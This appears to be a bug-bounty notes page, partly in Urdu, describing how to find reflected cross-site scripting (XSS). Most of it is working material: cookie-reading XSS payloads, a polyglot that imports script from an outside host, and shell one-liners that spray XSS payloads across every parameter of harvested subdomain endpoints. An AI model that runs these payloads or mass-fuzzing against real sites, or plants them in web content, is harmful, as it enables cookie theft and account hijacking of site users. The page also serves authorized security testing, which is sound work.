👑Find Reflected - XSS (CWE-79)

<img src="x" onerror="alert(document.cookie);"
<a AutoFocus contenteditable OnFocus="prompt`${1}`;"

Manual Testing during Automation

  1. On Burp and Add to Scope

  2. Turn on Burp Extensions to find Reflected XSS: Reflection + Reflector + isXSS + HopLa + Hackbar + Reflection-Tracer

  3. Turn on Crome Extention : Xnl Reveal

  4. Turn on Crome Extention: link Gopher and linkg rabber

  5. Turn on Crome Extention: input Hidden Moniter

  6. Turn on Burp Extention to TRACK OF TESTED ENDPOINTS: BURP SCOPE MONITOR

  7. website ko explore karty time hum her ek endpoint me Parameter me Probe Add karen gy

  8. website ko explore karty time hum her ek endpoint pe Source-code me

type="hidden" + type="hidden" + value="" + getparam

  1. URL Source Code me <Script> tags k ander a raha ha hum payload laga dy gy

    "-confirm(1)-"

  2. If Payload Encode then Search .replace in Source-Code

-------------------------------------------------------------

This Polyglot works for most HTML and JS injection scenarios

'/*\'/*"/*\"/*<​/Script><Input/AutoFocus/OnFocus​=/**/(import(/https:\\X55.is/.source))//>

-------------------------------------------------------------

Find RXSS Using Automation

paramspider -l livesubdomains.txt

cat all_endpoints.txt | grep '=' | qsreplace '"><img src=x onerrora=confirm() onerror=alert(1)>' | freq | tee -a possible_xss.txt
cat parameters.txt | grep '=' | qsreplace '"><img src=x onerrora=confirm() onerror=alert(1)>' | tee -a xss_fuzz.txt
cat xss_fuzz.txt | freq | tee -a possible_xss.txt

-------------------------------------------------------------

PreviousFind Stored - XSS (CWE-79)NextPython Script

Last updated